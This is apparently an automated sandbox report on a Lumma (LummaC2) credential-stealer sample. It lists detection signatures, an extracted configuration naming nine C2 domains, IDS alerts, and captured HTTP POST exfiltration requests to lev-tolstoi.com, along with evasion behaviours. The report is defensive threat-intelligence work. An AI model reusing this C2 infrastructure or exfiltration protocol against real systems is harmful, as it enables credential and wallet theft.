
Windows Analysis Report
MaZjv5XeQi.exe

Overview

General Information

Sample name: MaZjv5XeQi.exe (renamed because original name is a hash value)
Original sample name: 20460f73ddd6da12a34a1bc6911b0538.exe
Analysis ID: 1580922
MD5: 20460f73ddd6da12a34a1bc6911b0538
SHA1: 643fdda94defd6dc666e446dac08887c6799d9ef
SHA256: c25a7ddb2f76edf74c0174c631be03fca999cc3052e47f7a47ea41dc92657780
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • MaZjv5XeQi.exe (PID: 5608 cmdline: "C:\Users\user\Desktop\MaZjv5XeQi.exe" MD5: 20460F73DDD6DA12A34A1BC6911B0538)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["manyrestro.lat", "tentabatte.lat", "curverpluch.lat", "slipperyloo.lat", "wordyfindy.lat", "observerfry.lat", "bashfulacid.lat", "talkynicer.lat", "shapestickyr.lat"], "Build id": "PsFKDg--pablo"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2209553671.0000000000FE6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T13:14:15.113927+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP
2024-12-26T13:14:17.635550+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:19.766992+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:22.341952+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:24.656109+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:27.144452+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:29.988082+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-26T13:14:32.833657+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49715 | 172.67.157.254 | 443 | TCP
2024-12-26T13:14:36.082596+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49728 | 172.67.157.254 | 443 | TCP
2024-12-26T13:14:18.418371+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:20.561905+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:18.418371+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:20.561905+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:13.293004+0100 | 2058480 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 63361 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.962681+0100 | 2058484 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 61984 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.539037+0100 | 2058492 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49793 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.679082+0100 | 2058500 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56261 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.397561+0100 | 2058502 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59938 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.820808+0100 | 2058510 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56981 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:13.124075+0100 | 2058512 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 58993 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.257087+0100 | 2058514 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49590 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:25.521287+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49708 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:30.758464+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-26T13:14:15.913923+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP

AV Detection

Source: MaZjv5XeQi.exe | Avira: detected
Source: https://lev-tolstoi.com/u | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/MSWznTY69wwRW38B95y2 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apih3 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/api0GUP | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apia3 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apixI | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/PPL | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/MSWznTY69wwRW38B95 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/MSWznTY69wwRW38B95- | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/V4 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/piy7 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/WC | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apis | Avira URL Cloud: Label: malware
Source: MaZjv5XeQi.exe.5608.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "tentabatte.lat", "curverpluch.lat", "slipperyloo.lat", "wordyfindy.lat", "observerfry.lat", "bashfulacid.lat", "talkynicer.lat", "shapestickyr.lat"], "Build id": "PsFKDg--pablo"}
Source: MaZjv5XeQi.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: MaZjv5XeQi.exe | Joe Sandbox ML: detected
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: bashfulacid.lat
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: tentabatte.lat
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: curverpluch.lat
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: talkynicer.lat
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: shapestickyr.lat
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: manyrestro.lat
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: slipperyloo.lat
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: wordyfindy.lat
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: observerfry.lat
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmp | String decryptor: PsFKDg--pablo
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 0_2_009B57C0 CryptUnprotectData,0_2_009B57C0
Source: MaZjv5XeQi.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 0_2_009E0340
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then mov edx, ebx | 0_2_009A8600
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then mov edi, dword ptr [esi+30h] | 0_2_009ACC7A
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h] | 0_2_009E0D20
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then mov byte ptr [ebx], al | 0_2_009CD34A
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then mov eax, ebx | 0_2_009C7440
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h] | 0_2_009C7440
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h] | 0_2_009E1720
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_009C1A10
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Code function: 4x nop then mov byte ptr [ebx], al | 0_2_009CC09E

Networking

Source: Network traffic | Suricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:58993 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:59938 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:56981 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:56261 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:61984 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:49590 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:49793 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:63361 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49712 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49708 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: manyrestro.lat
Source: Malware configuration extractor | URLs: tentabatte.lat
Source: Malware configuration extractor | URLs: curverpluch.lat
Source: Malware configuration extractor | URLs: slipperyloo.lat
Source: Malware configuration extractor | URLs: wordyfindy.lat
Source: Malware configuration extractor | URLs: observerfry.lat
Source: Malware configuration extractor | URLs: bashfulacid.lat
Source: Malware configuration extractor | URLs: talkynicer.lat
Source: Malware configuration extractor | URLs: shapestickyr.lat
Source: Joe Sandbox View | IP Address: 104.21.66.86
Source: Joe Sandbox View | IP Address: 172.67.157.254
Source: Joe Sandbox View | IP Address: 104.102.49.254
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.102.49.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=RN9M0MOCCIEDMK7GH
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12829
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=OP9KY22WZVVGYZ4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15059
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=9WS1RYM3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20507
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=CW22BAAPRYQOSPW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1251
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=21B385563K4
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 570977
    Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: observerfry.lat
Source: global traffic | DNS traffic detected: DNS query: wordyfindy.lat
Source: global traffic | DNS traffic detected: DNS query: slipperyloo.lat
Source: global traffic | DNS traffic detected: DNS query: manyrestro.lat
Source: global traffic | DNS traffic detected: DNS query: shapestickyr.lat
Source: global traffic | DNS traffic detected: DNS query: talkynicer.lat
Source: global traffic | DNS traffic detected: DNS query: curverpluch.lat
Source: global traffic | DNS traffic detected: DNS query: tentabatte.lat
Source: global traffic | DNS traffic detected: DNS query: bashfulacid.lat
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
